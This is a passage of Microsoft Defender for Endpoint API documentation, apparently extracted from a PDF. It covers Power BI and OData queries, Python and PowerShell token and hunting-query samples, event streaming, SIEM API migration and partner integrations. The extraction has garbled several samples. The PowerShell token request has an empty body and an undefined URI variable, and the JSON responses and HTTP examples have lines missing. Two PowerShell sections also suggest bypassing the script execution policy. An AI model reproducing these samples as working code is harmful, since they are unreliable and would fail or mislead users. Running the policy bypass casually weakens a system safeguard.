AdvancedHuntingQuery = "DeviceEvents | where ActionType
contains 'Anti' | limit 20",
HuntingUrl =
"https://api.securitycenter.microsoft.com/api/advancedqueries",
Response = Json.Document(Web.Contents(HuntingUrl, [Query=

[key=AdvancedHuntingQuery]])),
TypeMap = #table(
{ "Type", "PowerBiType" },
{
{ "Double", Double.Type },
{ "Byte", Byte.Type },
{ "Single", Single.Type },
{ "Decimal", Decimal.Type },
{ "TimeSpan", Duration.Type },
{ "DateTime", DateTimeZone.Type },
{ "String", Text.Type },
{ "Boolean", Logical.Type },
{ "SByte", Logical.Type },
{ "Guid", Text.Type }
}),
Schema = Table.FromRecords(Response[Schema]),
TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name",
"Type"}), {"Type"}, TypeMap , {"Type"}),
Results = Response[Results],
Rows = Table.FromRecords(Results, Schema[Name]),
Table = Table.TransformColumnTypes(Rows,
Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))
in Table
5. Select Done.
6. Select Edit Credentials.
7. Select Organizational account > Sign in.
8. Enter your credentials and wait to be signed in.

9. Select Connect.
Now the results of your query appear as a table and you can start to build visualizations
on top of it!
You can duplicate this table, rename it, and edit the Advanced Hunting query inside to
get any data you would like.
Connect Power BI to OData APIs

The only difference from the previous example is the query inside the editor. Follow
steps 1-3 above.
At step 4, instead of the code in that example, copy the following code, and paste it in
the editor to pull all Machine Actions from your organization:
let
Query = "MachineActions",
Source = OData.Feed("https://api.securitycenter.microsoft.com/api/"
& Query, null, [Implementation="2.0", MoreColumns=true])
in
Source
You can do the same for Alerts and Machines. You also can use OData queries for
queries filters. See Using OData Queries.
Power BI dashboard samples in GitHub

For more information, see the Power BI report templates .
Sample reports
View the Microsoft Defender for Endpoint Power BI report samples. For more
information, see Browse code samples.
Related articles
Using OData Queries
 Tip
Feedback

Advanced Hunting using Python
Article • 02/22/2024
Applies to:
７ Note
 Tip
Run advanced queries using Python, see Advanced Hunting API.
In this section, we share Python samples to retrieve a token and use it to run a query.
Prerequisite: You first need to create an app.
Get token
Run the following commands:
Python
import json
import urllib.request
import urllib.parse
tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID

here
appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app
secret here
url = "https://login.microsoftonline.com/%s/oauth2/token" % (tenantId)
resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
body = {
'resource' : resourceAppIdUri,
'client_id' : appId,
'client_secret' : appSecret,
'grant_type' : 'client_credentials'
}
data = urllib.parse.urlencode(body).encode("utf-8")
req = urllib.request.Request(url, data)

response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
aadToken = jsonResponse["access_token"]
Where
tenantId: ID of the tenant on behalf of which you want to run the query (that is, the
query is run on the data of this tenant)
appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries'
permission to Microsoft Defender for Endpoint)
appSecret: Secret of your Microsoft Entra app
Run query
Run the following query:
Python
query = 'DeviceRegistryEvents | limit 10' # Paste your own query here
url = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
headers = {
'Content-Type' : 'application/json',
'Accept' : 'application/json',
'Authorization' : "Bearer " + aadToken
}
data = json.dumps({ 'Query' : query }).encode("utf-8")
req = urllib.request.Request(url, data, headers)

response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
schema = jsonResponse["Schema"]
results = jsonResponse["Results"]
schema contains the schema of the results of your query

results contain the results of your query
Complex queries
If you want to run complex queries (or multiline queries), save your query in a file and,
instead of the first line in the above sample, run the below command:
Python
queryFile = open("D:\\Temp\\myQuery.txt", 'r') # Replace with the path to

your file
query = queryFile.read()
queryFile.close()
Work with query results

You can now use the query results.
To iterate over the results, use the following command:
Python
for result in results:

print(result) # Prints the whole result
print(result["EventTime"]) # Prints only the property 'EventTime' from
the result
To output the results of the query in CSV format in file file1.csv use the following
command:
Python
import csv
outputFile = open("D:\\Temp\\file1.csv", 'w')

output = csv.writer(outputFile)
output.writerow(results[0].keys())
for result in results:
output.writerow(result.values())
outputFile.close()
To output the results of the query in JSON format in file file1.json use the following
command:
Python
outputFile = open("D:\\Temp\\file1.json", 'w')

json.dump(results, outputFile)
outputFile.close()
Related topic
 Tip
Feedback

Article • 02/22/2024
Applies to:
７ Note
 Tip
Run advanced queries using PowerShell. For more information, see Advanced Hunting
API.
In this section, we share PowerShell samples to retrieve a token and use it to run a
query.
Before you begin

You first need to create an app.
Preparation instructions
Open a PowerShell window.
If your policy doesn't allow you to run the PowerShell commands, you can run the
following command:
PowerShell
Set-ExecutionPolicy -ExecutionPolicy Bypass
For more information, see PowerShell documentation.
Get token
Run the following:
PowerShell
$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant

ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app
secret here
$body = [Ordered] @{
}
$response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -
ErrorAction Stop
$aadToken = $response.access_token
Where
$tenantId: ID of the tenant on behalf of which you want to run the query (that is,
the query is run on the data of this tenant)
$appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries'
permission to Defender for Endpoint)
$appSecret: Secret of your Microsoft Entra app
Run query
Run the following query:
PowerShell
$token = $aadToken
$query = 'DeviceRegistryEvents | limit 10' # Paste your own query here
$url = "https://api.securitycenter.microsoft.com/api/advancedhunting/run"
$headers = @{
Authorization = "Bearer $aadToken"
}
$body = ConvertTo-Json -InputObject @{ 'Query' = $query }
$webResponse = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -
Body $body -ErrorAction Stop
$response = $webResponse | ConvertFrom-Json
$results = $response.Results
$schema = $response.Schema
$results contain the results of your query

$schema contains the schema of the results of your query
Complex queries
If you want to run complex queries (or multilines queries), save your query in a file and,
instead of the first line in the above sample, run the following command:
PowerShell
$query = [IO.File]::ReadAllText("C:\myQuery.txt"); # Replace with the path

to your file
Work with query results

You can now use the query results.
To output the results of the query in CSV format in file file1.csv, run the following
command:
PowerShell
$results | ConvertTo-Csv -NoTypeInformation | Set-Content C:\file1.csv
To output the results of the query in JSON format in file file1.json, run the following
command:
PowerShell
$results | ConvertTo-Json | Set-Content file1.json

Related article
 Tip
Feedback

OData queries with Microsoft Defender
for Endpoint
Article • 11/30/2023
Applies to:

） Important
７ Note
 Tip
If you aren't familiar with OData queries, see: OData V4 queries
Not all properties are filterable.
Properties that support $filter

Alert: alertCreationTime , lastUpdateTime , incidentId , InvestigationId , status ,
severity , and category .
Machine: ComputerDnsName , LastSeen , HealthStatus , OsPlatform ,

onboardingStatus , RiskScore , and RbacGroupId .
MachineAction: Status , MachineId , Type , Requestor , and CreationDateTimeUtc .

Indicator: indicatorValue , indicatorType , creationTimeDateTimeUtc , createdBy ,
severity , and action .
Example 1
Get 10 latest Alerts with related Evidence:
HTTP
HTTP GET https://api.securitycenter.microsoft.com/api/alerts?

$top=10&$expand=evidence
Response
JSON
{
"@odata.context":
"value": [
{
"id": "da637472900382838869_1364969609",
"assignedTo": null,
"severity": "Low",
"status": "New",
"title": "Low-reputation arbitrary code executed by signed
executable",
"description": "Binaries signed by Microsoft can be used to run
low-reputation arbitrary code. This technique hides the execution of
malicious code within a trusted process. As a result, the trusted process
might exhibit suspicious behaviors, such as opening a listening port or
connecting to a command-and-control (C&C) server.",
"threatName": null,
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
},
"comments": [
{
"createdTime": "2021-01-26T01:00:37.8404534Z"
}
],
"evidence": [
{
"sha1": null,
"sha256": null,
"fileName": null,
"filePath": null,
"processId": null,
"ipAddress": null,
"url": null,
"userSid": "S-1-5-21-11111607-1111760036-109187956-
75141",
},
{
"sha256":
"processId": 3276,
"parentProcessCreationTime": "2021-01-
26T20:31:32.9004163Z",
"ipAddress": null,
"url": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
},
{
"sha256":
"processId": null,
"ipAddress": null,
"url": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
}
]
},
...
]
}
Example 2
Get all the alerts last updated after 2019-11-22 00:00:00:
HTTP
HTTP GET https://api.securitycenter.microsoft.com/api/alerts?

$filter=lastUpdateTime+ge+2019-11-22T00:00:00Z
Response
JSON
{
"@odata.context":
"value": [
{
"id": "da637308392288907382_-880718168",
"incidentId": 7587,
"investigationId": 723156,
"severity": "Low",
"status": "New",
"classification": "TruePositive",
"detectionSource": "WindowsDefenderAv",
"category": "SuspiciousActivity",
"threatFamilyName": "Meterpreter",
"title": "Suspicious 'Meterpreter' behavior was detected",
"description": "Malware and unwanted software are undesirable
applications that perform annoying, disruptive, or harmful actions on
affected machines. Some of these undesirable applications can replicate and
spread from one machine to another. Others are able to receive commands from
remote attackers and perform activities associated with cyber attacks.\n\nA
malware is considered active if it is found running on the machine or it
already has persistence mechanisms in place. Active malware detections are
assigned higher severity ratings.\n\nBecause this malware was active, take
precautionary measures and check for residual signs of infection.",
"machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
"rbacGroupName": "MiddleEast",
"threatName": null,
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
},
"comments": [
{
"createdTime": "2020-07-21T01:00:37.8404534Z"
}
],
"evidence": []
}
...
]
}
Example 3
Get all the devices with 'High' 'RiskScore':
HTTP
HTTP GET https://api.securitycenter.microsoft.com/api/machines?

$filter=riskScore+eq+'High'
Response
JSON
{
"@odata.context":
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"osBuild": 19042,
"riskScore": "High",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
}
]
},
...
]
}
Example 4
Get top 100 devices with 'HealthStatus' not equals to 'Active':
HTTP

$filter=healthStatus+ne+'Active'&$top=100
Response
JSON
{
"@odata.context":
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"osBuild": 19042,
"riskScore": "Low",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
}
]
},
...
]
}
Example 5
Get all the devices that last seen after 2018-10-20:
HTTP

$filter=lastSeen gt 2018-08-01Z
Response
JSON
{
"@odata.context":
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"osBuild": 19042,
"riskScore": "Low",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
}
]
},
...
]
}
Example 6
Get all the Anti-Virus scans that the user Analyst@examples.onmicrosoft.com created
using Microsoft Defender for Endpoint:
HTTP
HTTP GET https://api.securitycenter.microsoft.com/api/machineactions?

$filter=requestor eq 'Analyst@contoso.com' and type eq 'RunAntiVirusScan'
Response
JSON
json{
"@odata.context":
"value": [
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"scope": "Full",
3212",
},
...
]
}
Example 7
Get the count of open alerts for a specific device:
HTTP
HTTP GET
https://api.securitycenter.microsoft.com/api/machines/123321d0c675eaa415b8e5
f383c6388bff446c62/alerts/$count?$filter=status ne 'Resolved'
Response
JSON
4
Example 8
Get all the devices with 'computerDnsName' starting with 'mymachine':
HTTP

$filter=startswith(computerDnsName,'mymachine')
Response
JSON
json{
"@odata.context":
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"osBuild": 19042,
"riskScore": "Low",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
}
]
},
...
]
}
See also
 Tip
Feedback

using PowerShell
Article • 11/30/2023
Applies to:

） Important
７ Note
 Tip
Full scenario using multiple APIs from Microsoft Defender for Endpoint.
In this section, we share PowerShell samples to
Retrieve a token
Use token to retrieve the latest alerts in Microsoft Defender for Endpoint
For each alert, if the alert has medium or high priority and is still in progress, check
how many times the device has connected to suspicious URL.
Prerequisite: You first need to create an app.
Preparation instructions
Open a PowerShell window.
If your policy doesn't allow you to run the PowerShell commands, you can run the
below command:
Set-ExecutionPolicy -ExecutionPolicy Bypass
For more information, see PowerShell documentation
Get token
Run the below:
$tenantId: ID of the tenant on behalf of which you want to run the query (that is,
the query is run on the data of this tenant)
$appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries'
permission to Defender for Endpoint)
$appSecret: Secret of your Microsoft Entra app
$suspiciousUrl: The URL
$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant

ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app
secret here
$suspiciousUrl = 'www.suspiciousUrl.com' # Paste your own URL here
$resourceAppIdUri =
'https://securitycenter.onmicrosoft.com/windowsatpservice'
}
$aadToken = $authResponse.access_token
#Get latest alert

$alertUrl = "https://api.securitycenter.microsoft.com/api/alerts?`$top=10"
$headers = @{
Authorization = "Bearer $aadToken"
}
$alertResponse = Invoke-WebRequest -Method Get -Uri $alertUrl -Headers
$headers -ErrorAction Stop
$alerts = ($alertResponse | ConvertFrom-Json).value
$machinesToInvestigate = New-Object System.Collections.ArrayList
Foreach($alert in $alerts)
{
#echo $alert.id $alert.machineId $alert.severity $alert.status
$isSevereAlert = $alert.severity -in 'Medium', 'High'

$isOpenAlert = $alert.status -in 'InProgress', 'New'
if($isOpenAlert -and $isSevereAlert)
{
if (-not $machinesToInvestigate.Contains($alert.machineId))
{
$machinesToInvestigate.Add($alert.machineId) > $null
}
}
}
$commaSeparatedMachines = '"{0}"' -f ($machinesToInvestigate -join '","')
$query = "NetworkCommunicationEvents
| where MachineId in ($commaSeparatedMachines)
| where RemoteUrl == `"$suspiciousUrl`"
| summarize ConnectionsCount = count() by MachineId"
$queryUrl =
"https://api.securitycenter.microsoft.com/api/advancedqueries/run"
$queryBody = ConvertTo-Json -InputObject @{ 'Query' = $query }

$queryResponse = Invoke-WebRequest -Method Post -Uri $queryUrl -Headers
$headers -Body $queryBody -ErrorAction Stop
$response = ($queryResponse | ConvertFrom-Json).Results
$response
See also
 Tip
Feedback

Raw Data Streaming API
Article • 12/13/2023
Applies to:

 Tip
For the full data streaming experience available, see Stream Microsoft Defender
XDR events. If you're using Microsoft Defender for Business, see Use the streaming
API with Microsoft Defender for Business.
Stream Advanced Hunting events to Event

Hubs and/or Azure storage account
Microsoft Defender for Endpoint supports streaming events available through Advanced
Hunting to an Event Hubs and/or Azure storage account.
https://www.microsoft.com/en-us/videoplayer/embed/RE4r4ga?postJsllMsg=true
In this section
ﾉ Expand table
Topic Description
Stream Microsoft Defender for Learn about enabling the streaming API in your tenant and
Endpoint events to Azure configure Defender for Endpoint to stream Advanced Hunting
Event Hubs to Event Hubs.
Stream Defender for Endpoint Learn about enabling the streaming API in your tenant and
events to your Azure storage configure Defender for Endpoint to stream Advanced Hunting
account to your Azure storage account.
Related topics
Stream Microsoft Defender XDR events | Microsoft Learn
Overview of Advanced Hunting
Azure Event Hubs documentation
Azure Storage Account documentation
 Tip
Feedback

Endpoint to stream Advanced Hunting
events to your Azure Event Hubs
Article • 10/24/2023
Applies to:

７ Note
For the full data streaming experience available, please visit Stream Microsoft
Defender XDR events | Microsoft Learn.
Before you begin

1. Create an event hub in your tenant.
2. Log in to your Azure tenant , go to Subscriptions > Your subscription >

Resource Providers > Register to Microsoft.insights.
Enable raw data streaming

1. Log in to the Microsoft Defender XDR as a Global Administrator or Security
Administrator.
2. Go to the Data export settings page in the Microsoft Defender portal.
3. Click on Add data export settings.
4. Choose a name for your new settings.
5. Choose Forward events to Azure Event Hubs.
6. Type your Event Hubs name and your Event Hubs resource ID.
７ Note
Leaving Event Hubs name as empty will create an event hub for each category in
the selected namespace. Event Hubs namespaces have a limit of 10 Event Hubs if
you are not using a Dedicated Event Hubs Cluster.
In order to get your Event Hubs resource ID, go to your Azure Event Hubs namespace
page on Azure > properties tab > copy the text under Resource ID:
7. Choose the events you want to stream and click Save.
The schema of the events in Azure Event Hubs

JSON
{
"records": [
{
"time": "<The time WDATP received the event>"
"tenantId": "<The Id of the tenant that the event
belongs to>"
"category": "<The Advanced Hunting table name with
'AdvancedHunting-' prefix>"
"properties": { <WDATP Advanced Hunting event as
Json> }
}
...
]
}
Each event hub message in Azure Event Hubs contains list of records.
Each record contains the event name, the time Microsoft Defender for Endpoint
received the event, the tenant it belongs (you will only get events from your
tenant), and the event in JSON format in a property called "properties".
For more information about the schema of Microsoft Defender for Endpoint
events, see Advanced Hunting overview.
In Advanced Hunting, the DeviceInfo table has a column named MachineGroup

which contains the group of the device. Here every event will be decorated with
this column as well. See Device Groups for more information.
７ Note
2.
Data types mapping

To get the data types for event properties do the following:
1. Log in to Microsoft Defender XDR and go to Advanced Hunting page .
2. Run the following query to get the data types mapping for each event:
Kusto
{EventType}
| getschema
| project ColumnName, ColumnType
Here is an example for Device Info event:


Related topics
Microsoft Defender for Endpoint streaming API
Stream Microsoft Defender for Endpoint events to your Azure storage account
Azure Event Hubs documentation
Troubleshoot connectivity issues - Azure Event Hubs
 Tip
Feedback

Endpoint to stream Advanced Hunting
events to your Storage account
Article • 02/23/2024
Applies to:

７ Note
For the full data streaming experience available, please visit Stream Microsoft
Defender XDR events | Microsoft Learn.
Before you begin

1. Create a Storage account in your tenant.
2. Sign in to your Azure tenant , go to Subscriptions > Your subscription >

Resource Providers > Register to Microsoft.insights.
Enable raw data streaming

1. Sign in to the Microsoft Defender portal as a Global Administrator or Security
Administrator.
2. Go to Data export settings page in Microsoft Defender XDR.
3. Select on Add data export settings.
4. Choose a name for your new settings.
5. Choose Forward events to Azure Storage.
6. Type your Storage Account Resource ID. In order to get your Storage Account
Resource ID, go to your Storage account page on Azure portal > properties tab
> copy the text under Storage account resource ID:

7. Choose the events you want to stream and select Save.
The schema of the events in the Storage

account
A blob container is created for each event type:
The schema of each row in a blob is the following JSON:
JSON
{
"time": "<The time WDATP received the event>"
"tenantId": "<Your tenant ID>"
"category": "<The Advanced Hunting table name with 'AdvancedHunting-'
prefix>"
"properties": { <WDATP Advanced Hunting event as Json> }
}
Each blob contains multiple rows.
Each row contains the event name, the time Defender for Endpoint received the
event, the tenant it belongs (you get events only from your tenant), and the event
in JSON format in a property called "properties".
For more information about the schema of Microsoft Defender for Endpoint
events, see Advanced Hunting overview.
In Advanced Hunting, the DeviceInfo table has a column named MachineGroup

which contains the group of the device. Here, every event is decorated with this
column as well. For more information, see Device Groups.
７ Note
2.
Data types mapping

In order to get the data types for our events properties do the following:
1. Sign in to Microsoft Defender XDR and go to Advanced Hunting page .
2. Run the following query to get the data types mapping for each event:
Kusto
{EventType}
| getschema
| project ColumnName, ColumnType
Here's an example for Device Info event:


Related articles
Microsoft Defender for Endpoint Streaming API
Stream Microsoft Defender for Endpoint events to your Azure storage account
Azure Storage Account documentation
 Tip
Feedback

Migrate from the MDE SIEM API to the
Microsoft Defender XDR alerts API
Article • 02/16/2024
Applies to:

Use the new Microsoft Defender XDR API for

all your alerts
The Microsoft Defender XDR alerts API, released to public preview in MS Graph, is the
official and recommended API for customers migrating from the SIEM API. This API
enables customers to work with alerts across all Microsoft Defender XDR products using
a single integration. We expect the new API to reach general availability (GA) by Q1 CY
2023.
The SIEM API was deprecated on December 31, 2023. It's declared to be "deprecated,"
but not "retired." This means that until this date, the SIEM API continues to function for
existing customers. After the deprecation date, the SIEM API will continue to be
available, however it will only be supported for security-related fixes.
Effective December 31, 2024, three years after the original deprecation announcement,
we reserve the right to turn off the SIEM API, without further notice.
For additional information about the new APIs, see the blog announcement: The new
Microsoft Defender XDR APIs in Microsoft Graph are now available in public preview!
API documentation: Use the Microsoft Graph security API - Microsoft Graph
If you're a customer using the SIEM API, we strongly recommend planning and
executing the migration. This article includes information about the options available to
migrate to a supported capability:
1. Pulling MDE alerts into an external system (SIEM/SOAR).
2. Calling the Microsoft Defender XDR alerts API directly.
Read about the new Microsoft Defender XDR alerts and incidents API
Pulling Defender for Endpoint alerts into an external
system
If you're pulling Defender for Endpoint alerts into an external system, there are several
supported options to give organizations the flexibility to work with the solution of their
choice:
1. Microsoft Sentinel is a scalable, cloud-native, SIEM and Security orchestration,

automation, and response (SOAR) solution. Delivers intelligent security analytics
and threat intelligence across the enterprise, providing a single solution for attack
detection, threat visibility, proactive hunting, and threat response. The Microsoft
Defender XDR connector allows customers to easily pull in all their incidents and
alerts from all Microsoft Defender XDR products. To learn more about the
integration, see Microsoft Defender XDR integration with Microsoft Sentinel.
2. IBM Security QRadar SIEM provides centralized visibility and intelligent security
analytics to identify and prevent threats and vulnerabilities from disrupting
business operations. QRadar SIEM team has just announced the release of a new
DSM that is integrated with the new Microsoft Defender XDR alerts API to pull in
Microsoft Defender for Endpoint alerts. New customers are welcome to take
advantage of the new DSM upon release. Learn more about the new DSM and how
to easily migrate to it at Microsoft Defender XDR - IBM Documentation .
3. Splunk SOAR helps customers orchestrate workflows and automate tasks in

seconds to work smarter and respond faster. Splunk SOAR is integrated with the
new Microsoft Defender XDR APIs, including the alerts API. For more information,
see Microsoft Defender XDR | Splunkbase
Other integrations are listed in Technological partners of Microsoft Defender XDR, or

contact your SIEM / SOAR provider to learn about integrations they provide.
Calling the Microsoft Defender XDR alerts API directly

The below table provides a mapping between the SIEM API to the Microsoft Defender
XDR alerts API:
ﾉ Expand table
SIEM API property Mapping Microsoft Defender XDR alert API property
AlertTime -> createdDateTime
ComputerDnsName -> evidence/deviceEvidence: deviceDnsName

AlertTitle -> title
Category -> category
Severity -> severity
AlertId -> id
Actor -> actorDisplayName
LinkToWDATP -> alertWebUrl
IocName X IoC fields not supported
IocValue X IoC fields not supported
CreatorIocName X IoC fields not supported
CreatorIocValue X IoC fields not supported
Sha1 -> evidence/fileEvidence/fileDetails: sha1 (or

evidence/processEvidence/imageFile: sha1)
FileName -> evidence/fileEvidence/fileDetails: fileName (or

evidence/processEvidence/image: fileName)
FilePath -> evidence/fileEvidence/fileDetails: filePath (or

evidence/processEvidence/image: filePath)
IPAddress -> evidence/ipEvidence: ipAddress
URL -> evidence/urlEvidence: url
IoaDefinitionId -> detectorId
UserName -> evidence/userEvidence/userAccount: accountName
AlertPart X Obsolete (Defender for Endpoint alerts are

atomic/complete that are updatable, while the SIEM API
were immutable records of detections)
FullId X IoC fields not supported
LastProcessedTimeUtc -> lastActivityDateTime
ThreatCategory -> mitreTechniques []
ThreatFamilyName -> threatFamilyName
ThreatName -> threatDisplayName

RemediationAction -> evidence: remediationStatus
RemediationIsSuccess -> evidence: remediationStatus (implied)
Source -> detectionSource (use with serviceSource:

microsoftDefenderForEndpoint)
Md5 X Not supported
Sha256 -> evidence/fileEvidence/fileDetails: sha256 (or

evidence/processEvidence/imageFile: sha256)
WasExecutingWhileDetected -> evidence/processEvidence: detectionStatus
UserDomain -> evidence/userEvidence/userAccount: domainName
LogOnUsers -> evidence/deviceEvidence: loggedOnUsers []
MachineDomain -> Included in evidence/deviceEvidence: deviceDnsName
MachineName -> Included in evidence/deviceEvidence: deviceDnsName
InternalIPV4List X Not supported
InternalIPV6List X Not supported
FileHash -> Use sha1 or sha256
DeviceID -> evidence/deviceEvidence: mdeDeviceId
MachineGroup -> evidence/deviceEvidence: rbacGroupName
Description -> description
DeviceCreatedMachineTags -> evidence: tags [] (for deviceEvidence)
CloudCreatedMachineTags -> evidence: tags [] (for deviceEvidence)
CommandLine -> evidence/processEvidence: processCommandLine
IncidentLinkToWDATP -> incidentWebUrl
ReportId X Obsolete (Defender for Endpoint alerts are

atomic/complete that are updatable, while the SIEM API
were immutable records of detections)
LinkToMTP -> alertWebUrl
IncidentLinkToMTP -> incidentWebUrl
ExternalId X Obsolete
IocUniqueId X IoC fields not supported
Ingest alerts using security information and

events management (SIEM) tools
７ Note
Microsoft Defender for Endpoint Alert is composed from one or more suspicious
or malicious events that occurred on the device and their related details. The
Microsoft Defender for Endpoint Alert API is the latest API for alert consumption
and contains a detailed list of related evidence for each alert. For more information,
see Alert methods and properties and List alerts.
Microsoft Defender for Endpoint supports security information and event management
(SIEM) tools ingesting information from your enterprise tenant in Microsoft Entra ID
using the OAuth 2.0 authentication protocol for a registered Microsoft Entra application
representing the specific SIEM solution or connector installed in your environment.
Microsoft Defender for Endpoint APIs license and terms of use

Access the Microsoft Defender for Endpoint APIs
Hello World example (describes how to register an application in Microsoft Entra
ID)
Get access with application context
Microsoft Defender XDR SIEM integration
 Tip
Feedback

Troubleshoot SIEM tool integration
issues
Article • 11/15/2023
Applies to:

７ Note
Try our new APIs using MS Graph security API. Find out more at: Use the
Microsoft Graph security API - Microsoft Graph | Microsoft Learn.
７ Note
The new Microsoft Defender XDR alerts API, released to public preview in MS
Graph, is the official and recommended API for customers migrating from the SIEM
API. See Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts
API.
You might need to troubleshoot issues while pulling detections in your SIEM tools.
This page provides detailed steps to troubleshoot issues you might encounter.
Learn how to get a new client secret

If your client secret expires or if you've misplaced the copy provided when you were
enabling the SIEM tool application, you'll need to get a new secret.
1. Log in to the Azure management portal .
2. Select Microsoft Entra ID.
3. Select your tenant.
4. Click App registrations. Then in the applications list, select the application.
5. Select Certificates & Secrets section, Click on New Client Secret, then provide a
description and specify the validity duration.
6. Click Save. The key value is displayed.
7. Copy the value and save it in a safe place.
Error when getting a refresh access token

If you encounter an error when trying to get a refresh token when using the threat
intelligence API or SIEM tools, you'll need to add reply URL for relevant application in
Microsoft Entra ID.
1. Log in to the Azure management portal .
2. Select Microsoft Entra ID.
3. Select your tenant.
4. Click App Registrations. Then in the applications list, select the application.
5. Add the following URL:
For the European Union: https://winatpmanagement-

eu.securitycenter.windows.com/UserAuthenticationCallback
For the United Kingdom: https://winatpmanagement-

uk.securitycenter.windows.com/UserAuthenticationCallback
For the United States: https://winatpmanagement-

us.securitycenter.windows.com/UserAuthenticationCallback .
6. Click Save.
Error while enabling the SIEM connector

application
If you encounter an error when trying to enable the SIEM connector application, check
the pop-up blocker settings of your browser. It might be blocking the new window
being opened when you enable the capability.
Related topics
Pull detections to your SIEM tools
 Tip
Feedback

Partner applications in Microsoft
Article • 08/23/2023
Applies to:

Defender for Endpoint supports third-party applications to help enhance the detection,
investigation, and threat intelligence capabilities of the platform.
The support for third-party solutions helps to further streamline, integrate, and
orchestrate defenses from other vendors with Microsoft Defender for Endpoint; enabling
security teams to effectively respond better to modern threats.
Microsoft Defender for Endpoint seamlessly integrates with existing security solutions.
The integration provides integration with the following solutions such as:
SIEM
Ticketing and IT service management solutions
Managed security service providers (MSSP)
IoC indicators ingestions and matching
Automated device investigation and remediation based on external alerts
Integration with Security orchestration and automation response (SOAR) systems
Supported applications
Security information and analytics
ﾉ Expand table
Logo Partner name Description
AttackIQ Platform AttackIQ Platform validates Defender for Endpoint is

configured properly by launching continuous attacks safely on
production assets
AzureSentinel Stream alerts from Microsoft Defender for Endpoint into

Microsoft Sentinel
Cymulate Correlate Defender for Endpoint findings with simulated

attacks to validate accurate detection and effective response
actions
Elastic Security Elastic Security is a free and open solution for preventing,
detecting, and responding to threats
IBM QRadar Configure IBM QRadar to collect detections from Defender for
Endpoint
Micro Focus Use Micro Focus ArcSight to pull Defender for Endpoint
ArcSight detections
RSA NetWitness Stream Defender for Endpoint Alerts to RSA NetWitness using
Microsoft Graph Security API
SafeBreach Gain visibility into Defender for Endpoint security events that
are automatically correlated with SafeBreach simulations
Skybox Vulnerability Skybox Vulnerability Control cuts through the noise of

Control vulnerability management, correlating business, network, and
threat context to uncover your riskiest vulnerabilities
Splunk The Defender for Endpoint Add-on allows Splunk users to

ingest all of the alerts and supporting information to their
Splunk
XM Cyber Prioritize your response to an alert based on risk factors and

high value assets
Orchestration and automation
ﾉ Expand table
Fortinet FortiSOAR Fortinet FortiSOAR is a holistic Security

Orchestration, Automation and Response
(SOAR) workbench, designed for SOC teams
to efficiently respond to the ever-increasing
influx of alerts, repetitive manual processes,
and shortage of resources. It pulls together
all of organization's tools, helps unify
operations and reduces alert fatigue, context
switching, and the mean time to respond to
incidents.
Delta Risk Delta Risk, a leading provider of SOC-as-a-

ActiveEye Service and security services, integrate
Defender for Endpoint with its cloud-native
SOAR platform, ActiveEye.
Demisto, a Palo Demisto integrates with Defender for

Alto Networks Endpoint to enable security teams to
Company orchestrate and automate endpoint security
monitoring, enrichment, and response
Microsoft Flow & Use the Defender for Endpoint connectors

Azure Functions for Azure Logic Apps & Microsoft Flow to
automating security procedures
Rapid7 InsightConnect integrates with Defender for

InsightConnect Endpoint to accelerate, streamline, and
integrate your time-intensive security
processes
ServiceNow Ingest alerts into ServiceNow Security

Operations solution based on Microsoft
Graph API integration
Swimlane Maximize incident response capabilities

utilizing Swimlane and Defender for
Endpoint together
Threat intelligence
ﾉ Expand table
MISP (Malware Information Integrate threat indicators from the Open Source
Sharing Platform) Threat Intelligence Sharing Platform into your
Defender for Endpoint environment
Palo Alto Networks Enrich your endpoint protection by extending

Autofocus and other threat feeds to Defender for
Endpoint using MineMeld
ThreatConnect Alert and/or block on custom threat intelligence from

ThreatConnect Playbooks using Defender for Endpoint
